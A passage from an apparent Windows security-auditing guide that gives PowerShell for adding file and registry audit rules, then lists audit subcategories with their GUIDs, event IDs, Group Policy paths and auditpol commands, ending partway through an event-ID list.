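        [System.Security.AccessControl.AuditFlags]'Success, Failure'
    )
    # -Audit is required, otherwise Get-Acl does not read the SACL and Set-Acl would drop it.
    $acl = Get-Acl -Path $Path -Audit
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}

function Add-RegistryAuditRule {
    param([string]$Path, [string]$Identity)
    $rule = New-Object -TypeName System.Security.AccessControl.RegistryAuditRule -ArgumentList @(
        $Identity,
        [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership',
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AuditFlags]'Success, Failure'
    )
    $acl = Get-Acl -Path $Path -Audit
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}

if (-not (Test-Path $FolderPath))   { New-Item -ItemType Directory -Path $FolderPath | Out-Null }
if (-not (Test-Path $RegistryPath)) { New-Item -Path $RegistryPath -Force | Out-Null }

Add-FileAuditRule     -Path $FolderPath   -Identity $Principal
Add-RegistryAuditRule -Path $RegistryPath -Identity $Principal

# Show the audit entries now present on each object.
(Get-Acl -Path $FolderPath -Audit).Audit   | Format-Table IdentityReference, FileSystemRights, AuditFlags, InheritanceFlags -AutoSize
(Get-Acl -Path $RegistryPath -Audit).Audit | Format-Table IdentityReference, RegistryRights, AuditFlags -AutoSize

# One write each: the file write yields 4663 (Audit File System), the value
# change yields 4657 (Audit Registry), assuming both subcategories are enabled.
Set-Content -Path (Join-Path $FolderPath 'canary.txt') -Value 'audit test'
Set-ItemProperty -Path $RegistryPath -Name 'AuditCanary' -Value (Get-Date).ToString('o')

Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4663, 4657; StartTime = (Get-Date).AddMinutes(-5) } `
             -ErrorAction SilentlyContinue |
    Select-Object -First 5 TimeCreated, Id, Message
```

Audit ACEs inherit like permission ACEs, so `ContainerInherit, ObjectInherit` on a folder covers everything created beneath it; the same mechanism is what the `Global Object Access Auditing` policy automates fleet-wide when you would rather not touch each object. Pick the rights you audit deliberately: auditing `ReadData` on a busy share or `QueryValues` on a hot key is how the "High" volumes elsewhere in this guide happen.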
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-registry)\n\n#### Removable Storage\n\n- Subcategory GUID: `{0CCE9245-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4658\n  - 4663\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Removable Storage\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-removable-storage)\n\n#### SAM\n\n- Subcategory GUID: `{0CCE9220-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on domain controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4661\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit SAM\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sam)\n\n#### Central Access Policy Staging\n\n- Subcategory GUID: `{0CCE9246-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4818\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Central Access Policy Staging\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-central-access-policy-staging)\n\n### Policy Change\n\n#### Audit Policy Change\n\n- Subcategory GUID: `{0CCE922F-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4715\n  - 4719\n  - 4817\n  - 4902\n  - 4906\n  - 4907\n  - 4908\n  - 4912\n  - 4904\n  - 4905\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Audit Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-audit-policy-change)\n\n#### Authentication Policy Change\n\n- Subcategory GUID: `{0CCE9230-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4670\n  - 4706\n  - 4707\n  - 4716\n  - 4713\n  - 4717\n  - 4718\n  - 4739\n  - 4864\n  - 4865\n  - 4866\n  - 4867\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Authentication Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authentication-policy-change)\n\n#### Authorization Policy Change\n\n- Subcategory GUID: `{0CCE9231-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4703\n  - 4704\n  - 4705\n  - 4670\n  - 4911\n  - 4913\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Authorization Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authorization-policy-change)\n\n#### Filtering Platform Policy Change\n\n- Subcategory GUID: `{0CCE9233-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4709\n  - 4710\n  - 4711\n  - 4712\n  - 5040\n  - 5041\n  - 5042\n  - 5043\n  - 5044\n  - 5045\n  - 5046\n  - 5047\n  - 5048\n  - 5440\n  - 5441\n  - 5442\n  - 5443\n  - 5444\n  - 5446\n  - 5448\n  - 5449\n  - 5450\n  - 5456\n  - 5457\n  - 5458\n  - 5459\n  - 5460\n  - 5461\n  - 5462\n  - 5463\n  - 5464\n  - 5465\n  - 5466\n  - 5467\n  - 5468\n  - 5471\n  - 5472\n  - 5473\n  - 5474\n  - 5477\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Filtering Platform Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-policy-change)\n\n#### MPSSVC Rule-Level Policy Change\n\n- Subcategory GUID: `{0CCE9232-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4944\n  - 4945\n  - 4946\n  - 4947\n  - 4948\n  - 4949\n  - 4950\n  - 4951\n  - 4952\n  - 4953\n  - 4954\n  - 4956\n  - 4957\n  - 4958\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit MPSSVC Rule-Level Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-mpssvc-rule-level-policy-change)\n\n#### Other Policy Change Events\n\n- Subcategory GUID: `{0CCE9234-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4714\n  - 4819\n  - 4826\n  - 4909\n  - 4910\n  - 5063\n  - 5064\n  - 5065\n  - 5066\n  - 5067\n  - 5068\n  - 5069\n  - 5070\n  - 5447\n  - 6144\n  - 6145\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Other Policy Change Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9234-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-policy-change-events)\n\n### Privilege Use\n\n#### Non Sensitive Privilege Use\n\n- Subcategory GUID: `{0CCE9229-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Very High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4673\n  - 4674\n  - 4985\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Privilege Use\n                        - Audit Non Sensitive Privilege Use\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9229-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-non-sensitive-privilege-use)\n\n#### Other Privilege Use Events\n\n- Subcategory GUID: `{0CCE922A-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4985\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Privilege Use\n                        - Audit Other Privilege Use Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-privilege-use-events)\n\n#### Sensitive Privilege Use\n\n- Subcategory GUID: `{0CCE9228-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4673\n  - 4674\n  - 4985\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Privilege Use\n                        - Audit Sensitive Privilege Use\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9228-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sensitive-privilege-use)\n\n### System\n\n#### IPsec Driver\n\n- Subcategory GUID: `{0CCE9213-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4960\n  - 4961\n  - 4962\n  - 4963\n  - 4965\n  - 5478\n  - 5479\n  - 5480\n  - 5483\n  - 5484\n  - 5485\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit IPsec Driver\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9213-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-driver)\n\n#### Other System Events\n\n- Subcategory GUID: `{0CCE9214-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5024\n  - 5025\n  - 5027\n  - 5028\n  - 5029\n  - 5030\n  - 5032\n  - 5033\n  - 5034\n  - 5035\n  - 5037\n  - 5058\n  - 5059\n  - 6400\n  - 6401\n  - 6402\n  - 6403\n  - 6404\n  - 6405\n  - 6406\n  - 6407\n  - 6408\n  - 6409\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit Other System Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9214-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-system-events)\n\n#### Security State Change\n\n- Subcategory GUID: `{0CCE9210-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4608\n  - 4616\n  - 4621\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit Security State Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9210-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-state-change)\n\n#### Security System Extension\n\n- Subcategory GUID: `{0CCE9211-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4610\n  - 4611\n  - 4614\n  - 4622\n  - 4697\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit Security System Extension\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9211-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-system-extension)\n\n#### System Integrity\n\n- Subcategory GUID: `{0CCE9212-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4612\n  - 4615\n  - 4618\n  - 4816\n  - 5038\n  - 5056\n  - 5062\n  - 5057\n  - 5060\n  - 5061\n  - 6281\n  - 6410\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - System\n                        - Audit System Integrity\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9212-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-system-integrity)\n\n### Global Object Access Auditing\n\nTBD\n\n## Full Event(s) List\n\n<details>\n    <summary>Expand Full List</summary>\n\n- [1100: The event logging service has shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1100)\n- [1102: The audit log was cleared.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102)\n- [1104: The security log is now full.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1104)\n- [1105: Event log automatic backup.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1105)\n- [1108: The event logging service encountered an error while processing an incoming event published from %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1108)\n- [4608: Windows is starting up.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4608)\n- [4610: An authentication package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4610)\n- [4611: A trusted logon process has been registered with the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4611)\n- [4612: Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4612)\n- [4614: A notification package has been loaded by the Security Account Manager.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4614)\n- [4615: Invalid use of LPC port.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4615)\n- 
[4616: The system time was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616)\n- [4618: A monitored security event pattern has occurred.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4618)\n- [4621: Administrator recovered system from CrashOnAuditFail.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4621)\n- [4622: A security package has been loaded by the Local Security Authority.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4622)\n- [4624: An account was successfully logged on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624)\n- [4625: An account failed to log on.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625)\n- [4626: User/Device claims information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4626)\n- [4627: Group membership information.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4627)\n- [4634: An account was logged off.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634)\n- [4646: Security ID: %1](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4646)\n- [4647: User initiated logoff.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647)\n- [4648: A logon was attempted using explicit credentials.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4648)\n- [4649: A replay attack was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649)\n- [4650: An IPsec Main Mode security association was established. 
Extended Mode was not enabled. Certificate authentication was not used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4650)\n- [4651: An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4651)\n- [4652: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4652)\n- [4653: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4653)\n- [4655: An IPsec Main Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4655)\n- [4656: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656)\n- [4657: A registry value was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657)\n- [4658: The handle to an object was closed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4658)\n- [4660: An object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4660)\n- [4661: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661)\n- [4662: An operation was performed on an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662)\n- [4663: An attempt was made to access an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663)\n- [4664: An attempt was made to create a hard link.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4664)\n- [4665: An attempt was made to create an application client 
context.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4665)\n- [4666: An application attempted an operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4666)\n- [4667: An application client context was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4667)\n- [4668: An application was initialized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4668)\n- [4670: Permissions on an object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4670)\n- [4671: An application attempted to access a blocked ordinal through the TBS.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4671)\n- [4672: Special privileges assigned to new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672)\n- [4673: A privileged service was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673)\n- [4674: An operation was attempted on a privileged object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4674)\n- [4675: SIDs were filtered.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4675)\n- [4688: A new process has been created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4688)\n- [4689: A process has exited.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4689)\n- [4690: An attempt was made to duplicate a handle to an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4690)\n- [4691: Indirect access to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4691)\n- [4692: Backup of data protection master key was 
